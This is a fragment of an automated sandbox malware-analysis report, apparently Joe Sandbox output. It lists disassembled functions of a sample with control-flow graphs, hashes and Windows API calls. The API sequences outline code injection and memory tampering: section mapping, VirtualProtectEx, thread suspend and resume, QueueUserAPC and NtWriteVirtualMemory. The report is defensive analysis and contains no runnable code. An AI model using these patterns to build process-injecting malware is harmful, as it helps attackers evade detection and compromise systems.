                            APIs
                            • CreateMutexExA.KERNEL32 ref: 00DAEFC5
                            • GetUserNameA.ADVAPI32 ref: 00DAF1FE
                              • Part of subcall function 00DC26BC: CreateThread.KERNELBASE ref: 00DC26EC
                              • Part of subcall function 00DC26BC: QueueUserAPC.KERNELBASE ref: 00DC2703
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateUser$MutexNameQueueThread
                            • String ID:
                            • API String ID: 2503873790-0
                            • Opcode ID: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                            • Instruction ID: 1e4c1286a780c144af1ef9429ca987bf144637903b1c5b9480dd2ad997933eeb
                            • Opcode Fuzzy Hash: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                            • Instruction Fuzzy Hash: 0E72F374619B088FE738EF68EC8566673E1F759300B24856ED48BC3261DE38E947CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DB583C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 597 db583c-db587e 599 db5a4f 597->599 600 db5884-db58c7 597->600 601 db5a54-db5a77 599->601 604 db5a3b-db5a4d 600->604 605 db58cd-db58ec 600->605 604->601 605->604 608 db58f2-db5911 605->608 608->604 610 db5917-db5936 608->610 610->604 612 db593c-db595b 610->612 612->604 614 db5961-db59e3 call dae53c NtCreateSection 612->614 617 db5a2a-db5a2f 614->617 618 db59e5-db5a02 call db41d8 614->618 624 db5a31-db5a33 617->624 622 db5a20-db5a28 618->622 623 db5a04-db5a1e call dae53c 618->623 622->624 623->624 624->604 625 db5a35-db5a39 624->625 625->601
                            APIs
                            • NtCreateSection.NTDLL ref: 00DB59DE
                              • Part of subcall function 00DB41D8: NtMapViewOfSection.NTDLL ref: 00DB4224
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: Section$CreateView
                            • String ID: 0
                            • API String ID: 1585966358-4108050209
                            • Opcode ID: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                            • Instruction ID: 16237a31bcec2f6b6a8ca359729edd54665c7e27f8ffa270825499f24b425efa
                            • Opcode Fuzzy Hash: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                            • Instruction Fuzzy Hash: 5F61D370208F098FDB54EF18E8C9AA577E1FB99305F10466EE84AC7265DB34E941CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DC04CC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 629 dc04cc-dc04e0 630 dc0526-dc052e 629->630 631 dc04e2-dc050d NtAllocateVirtualMemory 629->631 632 dc050f-dc051f 631->632 633 dc0521-dc0522 631->633 632->630 633->630
                            APIs
                            • NtAllocateVirtualMemory.NTDLL ref: 00DC0509
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID: @
                            • API String ID: 2167126740-2766056989
                            • Opcode ID: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                            • Instruction ID: 0e83a7405326285f8179994387ce3b2e2c25854c2f480c5db91e480d3f493a1d
                            • Opcode Fuzzy Hash: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                            • Instruction Fuzzy Hash: 21F09070614A058BDB449FA8D8CCA7E7AE0FB5C301F40096DE10ACB294DB78C9048B45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DDF00C Relevance: 3.3, APIs: 2, Instructions: 338nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 636 ddf00c-ddf063 639 ddf33d-ddf355 636->639 640 ddf069-ddf082 636->640 647 ddf358-ddf36a 639->647 641 ddf088-ddf091 640->641 642 ddf237-ddf282 NtProtectVirtualMemory 640->642 641->642 646 ddf097-ddf09f 641->646 644 ddf31c-ddf31e 642->644 645 ddf288-ddf289 642->645 644->647 648 ddf320-ddf33b 644->648 649 ddf28d-ddf28f 645->649 650 ddf0a2-ddf0ae 646->650 648->647 649->647 653 ddf295-ddf299 649->653 651 ddf0cc-ddf0fa 650->651 652 ddf0b0-ddf0b1 650->652 663 ddf228-ddf229 651->663 664 ddf100-ddf111 651->664 654 ddf0b3-ddf0ca 652->654 656 ddf29b-ddf2af 653->656 657 ddf2b1-ddf2b5 653->657 654->651 654->654 658 ddf2d0-ddf316 NtProtectVirtualMemory 656->658 659 ddf2cd-ddf2ce 657->659 660 ddf2b7-ddf2cb 657->660 658->644 658->649 659->658 660->658 667 ddf22e-ddf231 663->667 665 ddf11e-ddf13a 664->665 666 ddf113-ddf118 664->666 669 ddf20c-ddf220 665->669 670 ddf140-ddf17e 665->670 666->665 668 ddf204-ddf205 666->668 667->642 667->647 668->669 669->650 671 ddf226 669->671 674 ddf1a7-ddf1c3 670->674 675 ddf180-ddf188 670->675 671->667 679 ddf1c8-ddf1ca 674->679 680 ddf1c5 674->680 676 ddf18a-ddf191 675->676 677 ddf193-ddf1a4 675->677 676->676 676->677 677->674 681 ddf1cc-ddf1ee 679->681 682 ddf1fe-ddf1ff 679->682 680->679 681->669 683 ddf1f0-ddf1f9 681->683 682->668 683->670
                            APIs
                            • NtProtectVirtualMemory.NTDLL ref: 00DDF27A
                            • NtProtectVirtualMemory.NTDLL ref: 00DDF309
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120165643.0000000000DDF000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DDF000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_ddf000_control.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: a59e7330c344a8924aadb8df579730d348d62e2dd0b3f31548d4106938de021f
                            • Instruction ID: aa614a0ef0fbcd30f7ee3a9552a1ee4b839fd250506ea6a1bf05964f292214a2
                            • Opcode Fuzzy Hash: a59e7330c344a8924aadb8df579730d348d62e2dd0b3f31548d4106938de021f
                            • Instruction Fuzzy Hash: 3DA1F33120CB888FC725DF28DC816A9B7E1FB96310F58497ED0CBC7352D634A94A8796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DAB4B8 Relevance: 1.8, APIs: 1, Instructions: 292memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                            • Instruction ID: 1681782515b80ee081e97b63b9d4cf0e2df712a01654682bc66d9d81b33c4e65
                            • Opcode Fuzzy Hash: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                            • Instruction Fuzzy Hash: 3C81A730618B098FE768EF28D89976637E5FB99311F24452ED44BC3262EF78D8438751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DDF36C Relevance: 1.7, APIs: 1, Instructions: 191nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtProtectVirtualMemory.NTDLL ref: 00DDF309
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120165643.0000000000DDF000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DDF000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_ddf000_control.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: ace8e25785d53be990e295b6630041c346870120cbdade4e215488f30dd9fa8c
                            • Instruction ID: 1ddbabc70d29607ec308d09ff18ab7b2f6d07c0a2346f81f44102b821c98f7cb
                            • Opcode Fuzzy Hash: ace8e25785d53be990e295b6630041c346870120cbdade4e215488f30dd9fa8c
                            • Instruction Fuzzy Hash: 765156B158E7D24FE3034B389CA25967FB0EE1361471A44EBC4D2CF2A3D218985BC762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DCA148 Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtQueryInformationProcess.NTDLL ref: 00DCA16E
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: InformationProcessQuery
                            • String ID:
                            • API String ID: 1778838933-0
                            • Opcode ID: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                            • Instruction ID: d75499b2061df835f63edfbebcb5a6300475434f2b5d694c72faaee89a1086c3
                            • Opcode Fuzzy Hash: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                            • Instruction Fuzzy Hash: 6F016D30318E4E8F9B84EF6CD5C4B25B3E4FBA8309B58016EA40AC7124D634D881CB12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DB41D8 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                            • Instruction ID: 9c92c7206e8fd4cd4e729b00bf6851ba04d4ce0debe37c602e59e3a337323a1a
                            • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                            • Instruction Fuzzy Hash: A401D670A08B048FCB44DF69D0C8569BBE1FB58311B50066FE949CB796DB70D885CB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DA40C0 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: MemoryReadVirtual
                            • String ID:
                            • API String ID: 2834387570-0
                            • Opcode ID: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                            • Instruction ID: fbb0f1115aee5ded89a5be42495bddb96d40057be39ead497f6e890283d4a53d
                            • Opcode Fuzzy Hash: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                            • Instruction Fuzzy Hash: C1E0DF34715B808BEB00ABB88CCA63D33D4FBDA305F200839E941C7320C66EC8909312
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DA6D24 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtWriteVirtualMemory.NTDLL ref: 00DA6D43
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: MemoryVirtualWrite
                            • String ID:
                            • API String ID: 3527976591-0
                            • Opcode ID: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                            • Instruction ID: 7d572583fa5ed50d11620b63d42b0b05fc78d9c72f6a7399c1964f371d252034
                            • Opcode Fuzzy Hash: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                            • Instruction Fuzzy Hash: 97E04F74B25A448BEF14AFB888C923973D1F789305F24083AEA55C7364DA69C8869752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DAECA8 Relevance: 6.2, APIs: 4, Instructions: 234threadinjectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 144 daeca8-daed1b call dae53c call da495c 149 daed1d-daed3d call da9660 144->149 150 daed43-daed4e 144->150 149->150 157 daeec7-daeecb 149->157 152 daed5e-daed80 call da40c0 150->152 153 daed50-daed5c call dab11c 150->153 162 daeebf-daeec5 152->162 163 daed86-daed8c 152->163 153->152 160 daeecd-daeece 157->160 161 daeed7-daeef4 157->161 160->161 162->157 164 daeeb8-daeebd 163->164 165 daed92-daedb7 VirtualProtectEx 163->165 164->157 167 daedb9-daedd1 call da4a48 165->167 168 daedd3 165->168 170 daedd5-daedd7 167->170 168->170 170->162 172 daeddd-daede3 170->172 173 daede8-daee22 ResumeThread SuspendThread 172->173 175 daee37-daee39 173->175 176 daee24-daee2f 173->176 177 daee3b-daee43 175->177 178 daee45-daee4d 175->178 176->175 177->173 177->178 180 daee4f-daee54 178->180 181 daee56-daee6d call da9660 178->181 182 daee6f-daee9c VirtualProtectEx 180->182 181->182 182->157 185 daee9e-daeeb6 call da4a48 182->185 185->157
                            APIs
                              • Part of subcall function 00DA495C: FindCloseChangeNotification.KERNELBASE ref: 00DA4A08
                            • VirtualProtectEx.KERNELBASE ref: 00DAEDAF
                            • ResumeThread.KERNELBASE ref: 00DAEDEC
                            • SuspendThread.KERNELBASE ref: 00DAEE0F
                            • VirtualProtectEx.KERNELBASE ref: 00DAEE8C
                              • Part of subcall function 00DA4A48: VirtualProtectEx.KERNELBASE ref: 00DA4A9C
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ProtectVirtual$Thread$ChangeCloseFindNotificationResumeSuspend
                            • String ID:
                            • API String ID: 4107391026-0
                            • Opcode ID: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                            • Instruction ID: a9567da0230d8097c4e56173b6f18f20f1e5a7477fc80c7c87a8b5f6e3a87f5c
                            • Opcode Fuzzy Hash: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                            • Instruction Fuzzy Hash: 9C61B130708A084BD768EB28E8857AA73D1FB99311F14052DE58EC3281DF34D946CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DA25C0 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 228 da25c0-da25ea call dcc930 231 da25f0-da2607 call dc887c 228->231 232 da2705-da271c 228->232 235 da260d-da2622 231->235 236 da26f1-da26fd 231->236 237 da2626-da262a 235->237 236->232 238 da2648-da2655 237->238 239 da262c-da2646 237->239 238->236 241 da265b 238->241 239->238 240 da265d-da2668 239->240 240->236 242 da266e-da26a1 CreateFileA 240->242 241->237 242->236 243 da26a3-da26b6 SetFilePointer 242->243 244 da26e8-da26eb FindCloseChangeNotification 243->244 245 da26b8-da26d8 ReadFile 243->245 244->236 245->244 246 da26da-da26df 245->246 246->244 247 da26e1-da26e6 246->247 247->244
                            APIs
                            • CreateFileA.KERNELBASE ref: 00DA2694
                            • SetFilePointer.KERNELBASE ref: 00DA26AE
                            • ReadFile.KERNELBASE ref: 00DA26D0
                            • FindCloseChangeNotification.KERNELBASE ref: 00DA26EB
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                            • String ID:
                            • API String ID: 2405668454-0
                            • Opcode ID: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                            • Instruction ID: 90ba9f6bb6d9ddb01a6c1ff1a5ef2e0b78766288a061df03a27b7143778548e0
                            • Opcode Fuzzy Hash: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                            • Instruction Fuzzy Hash: 2641C730219A084FDB58DF2DD8C4B3573E1FB99315B28466EE09AC3261DE35D8438B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DA1930 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 248 da1930-da1982 250 da1988-da198b 248->250 251 da1b19 248->251 253 da198d-da1993 250->253 252 da1b1e-da1b34 251->252 254 da19e0-da19e2 253->254 255 da1995-da1998 253->255 256 da19eb-da19ee 254->256 257 da19e4-da19e9 254->257 258 da199a-da199d 255->258 259 da19c6-da19c8 255->259 262 da1b00 256->262 263 da19f4-da1a16 256->263 257->256 258->259 264 da199f-da19a1 258->264 260 da19ca-da19d1 259->260 261 da19d3-da19d4 259->261 260->261 265 da19d7-da19de 261->265 268 da1b05-da1b17 RtlDeleteBoundaryDescriptor 262->268 271 da1af9-da1afe 263->271 272 da1a1c-da1a29 263->272 266 da19c2-da19c4 264->266 267 da19a3-da19a6 264->267 265->253 265->254 266->265 267->256 270 da19a8-da19b3 267->270 268->252 273 da19b8-da19bf 270->273 274 da19b5 270->274 271->268 275 da1a2f-da1a35 272->275 276 da1aec-da1af7 272->276 273->266 274->273 277 da1a37-da1a8b 275->277 276->268 280 da1a8d-da1a8e 277->280 281 da1ac3-da1ae1 277->281 282 da1a90-da1a9f lstrcmp 280->282 281->277 288 da1ae7-da1ae8 281->288 283 da1abc 282->283 284 da1aa1-da1ab8 282->284 287 da1abe-da1abf 283->287 284->282 286 da1aba 284->286 286->287 287->281 288->276
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: BoundaryDeleteDescriptorlstrcmp
                            • String ID:
                            • API String ID: 735288309-3916222277
                            • Opcode ID: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                            • Instruction ID: 0f6999062da27aae1213a4635156323f628eb9c37e78963e47288da7153bf8bd
                            • Opcode Fuzzy Hash: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                            • Instruction Fuzzy Hash: 0A517A3561CA584FD72CAE5CDC8627A73D5F78A311F28013ED9DAC3251DA209C538BD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DBD43C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 289 dbd43c-dbd483 call dc7004 292 dbd489-dbd4ba RegQueryValueExA 289->292 293 dbd522-dbd529 289->293 294 dbd4bc-dbd4c1 292->294 295 dbd4c3-dbd4cc call dc772c 292->295 296 dbd52b-dbd533 293->296 297 dbd55d-dbd565 293->297 294->295 302 dbd4d1-dbd4e0 294->302 295->302 298 dbd553 296->298 299 dbd535-dbd551 call db9684 296->299 300 dbd567-dbd580 297->300 301 dbd5d5-dbd5e4 297->301 298->297 299->297 299->298 309 dbd5ce-dbd5cf 300->309 310 dbd582-dbd5c4 300->310 305 dbd4e2-dbd515 302->305 306 dbd517-dbd518 302->306 305->306 306->293 309->301 310->309
                            APIs
                              • Part of subcall function 00DC7004: RegCreateKeyA.ADVAPI32(?,?,?,00DC9153), ref: 00DC7027
                            • RegQueryValueExA.KERNELBASE ref: 00DBD4B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateQueryValue
                            • String ID: ($(
                            • API String ID: 2711935003-222463766
                            • Opcode ID: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                            • Instruction ID: 32b54264d6560cf825db36f1fef0039b338603f5b7b1e4dfabd7997d77faec15
                            • Opcode Fuzzy Hash: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                            • Instruction Fuzzy Hash: 2041B670618748CFE744EF18E8986A677E5F799309F04C52DD48AC3260EF78DA45CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DAB7C0 Relevance: 4.6, APIs: 3, Instructions: 101registrymemoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 312 dab7c0-dab811 RegQueryValueExA 313 dab819-dab831 RtlAllocateHeap 312->313 314 dab813-dab817 312->314 316 dab86a-dab891 RegQueryValueExA 313->316 317 dab833 313->317 315 dab84d-dab869 314->315 318 dab836-dab839 316->318 319 dab893-dab89d 316->319 317->318 318->315 320 dab83b-dab845 318->320 319->315 320->315
                            APIs
                            • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000001F), ref: 00DAB803
                            • RtlAllocateHeap.NTDLL ref: 00DAB825
                            • RegQueryValueExA.KERNELBASE ref: 00DAB887
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: QueryValue$AllocateHeap
                            • String ID:
                            • API String ID: 2311914766-0
                            • Opcode ID: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                            • Instruction ID: 9b2f0646a031744ee950da3916f2354ac4fba0952891bd54c9730ee943f1939b
                            • Opcode Fuzzy Hash: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                            • Instruction Fuzzy Hash: 8C31B43161CB088FEB58EF18D489666B3E0FBA8311F11452EE849C3256DF34DC428B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DCE2C4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 545 dce2c4-dce341 546 dce368-dce394 545->546 547 dce343-dce363 545->547 548 dce3aa-dce3ae 546->548 549 dce396-dce3a8 546->549 554 dce59a-dce5b1 547->554 550 dce3b2-dce3be 548->550 549->550 552 dce3dc-dce3df 550->552 553 dce3c0-dce3cf 550->553 555 dce3e5-dce3e8 552->555 556 dce4b3-dce4bb 552->556 564 dce3d5-dce3d6 553->564 565 dce570-dce57a 553->565 560 dce3fc-dce40d LoadLibraryA 555->560 561 dce3ea-dce3fa 555->561 557 dce4cc-dce4cf 556->557 558 dce4bd-dce4ca 556->558 562 dce56c-dce56d 557->562 563 dce4d5-dce4d8 557->563 558->557 566 dce40f-dce423 560->566 567 dce467-dce471 560->567 561->560 561->567 562->565 569 dce4da-dce4dd 563->569 570 dce503-dce517 563->570 564->552 573 dce57c-dce591 565->573 574 dce597-dce598 565->574 580 dce425-dce435 566->580 581 dce437-dce462 566->581 571 dce4a3-dce4a4 567->571 572 dce473-dce477 567->572 569->570 576 dce4df-dce4ea 569->576 570->562 586 dce519-dce52d 570->586 577 dce4ac-dce4ad 571->577 572->577 578 dce479-dce48a 572->578 573->574 574->554 576->570 582 dce4ec-dce4f1 576->582 577->556 578->577 590 dce48c-dce4a1 578->590 580->567 580->581 581->554 582->570 584 dce4f3-dce4f8 582->584 584->570 589 dce4fa-dce501 584->589 592 dce53c-dce53f 586->592 593 dce52f-dce53a 586->593 589->562 589->570 590->577 592->562 594 dce541-dce568 592->594 593->592 594->562
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: H
                            • API String ID: 1029625771-2852464175
                            • Opcode ID: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                            • Instruction ID: 19c4a2cd3721d0e374bbeb9448a84f962fe0103819be38d8ec8ecf7fc0fa9755
                            • Opcode Fuzzy Hash: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                            • Instruction Fuzzy Hash: 6AA1B170518F0A8FEB55EF58D888BA673E1FB98315F04062ED88AC3261EF34D841CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DA1B38 Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 684 da1b38-da1b80 call dc887c 687 da1d09-da1d0e 684->687 688 da1b86-da1b9f call dc7340 684->688 689 da1d12-da1d32 687->689 693 da1cff-da1d07 688->693 694 da1ba5-da1bd6 call db0af0 688->694 693->689 694->689 698 da1bdc-da1be4 694->698 699 da1c5f-da1c8e VirtualProtect 698->699 700 da1be6-da1beb 698->700 702 da1c9d-da1cf5 call dca148 699->702 703 da1c90-da1c98 call dafd58 699->703 700->699 701 da1bed-da1bff call da634c 700->701 701->699 708 da1c01-da1c19 call dc7340 701->708 702->689 715 da1cf7-da1cfd 702->715 703->702 708->699 714 da1c1b-da1c59 VirtualProtect 708->714 714->699 715->689
                            APIs
                              • Part of subcall function 00DC7340: VirtualProtect.KERNELBASE ref: 00DC7373
                            • VirtualProtect.KERNELBASE ref: 00DA1C59
                            • VirtualProtect.KERNELBASE ref: 00DA1C7C
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                            • Instruction ID: b169e1fe7311eb167ee845b122632741dbad34b07fb4cb53163d48e48d155bb7
                            • Opcode Fuzzy Hash: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                            • Instruction Fuzzy Hash: 60516C70618F098FDB44EF29D889B25B7E5FB98311F14056EE84AC7261EB34E941CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DABC00 Relevance: 3.2, APIs: 2, Instructions: 152COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 716 dabc00-dabc4e 717 dabc58-dabc6b call db23db 716->717 718 dabc50-dabc51 716->718 721 dabcaf-dabce8 call da65e4 717->721 722 dabc6d-dabc7f StrRChrA 717->722 718->717 728 dabcea-dabcf0 721->728 729 dabd0e-dabd16 721->729 724 dabc81-dabc84 722->724 725 dabc86-dabc87 722->725 727 dabc8d-dabca9 call daa9c8 724->727 725->727 727->721 728->729 730 dabcf2-dabcfa 728->730 731 dabd18-dabd22 729->731 732 dabd24-dabd4a 729->732 730->729 734 dabcfc-dabd01 730->734 731->732 735 dabd8f-dabd99 731->735 742 dabd4c-dabd53 call dabdbc 732->742 743 dabd83-dabd89 732->743 736 dabd03-dabd0c 734->736 737 dabd9b-dabda2 735->737 738 dabda9-dabdba 735->738 736->729 736->736 737->738 742->743 749 dabd55-dabd5c 742->749 750 dabd8b-dabd8d 743->750 751 dabd5e-dabd6e RtlAddVectoredContinueHandler 749->751 752 dabd74-dabd77 call daeef8 749->752 750->735 750->738 751->752 754 dabd7c-dabd81 752->754 754->743 754->750
                            APIs
                            • StrRChrA.KERNELBASE ref: 00DABC73
                            • RtlAddVectoredContinueHandler.NTDLL ref: 00DABD67
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
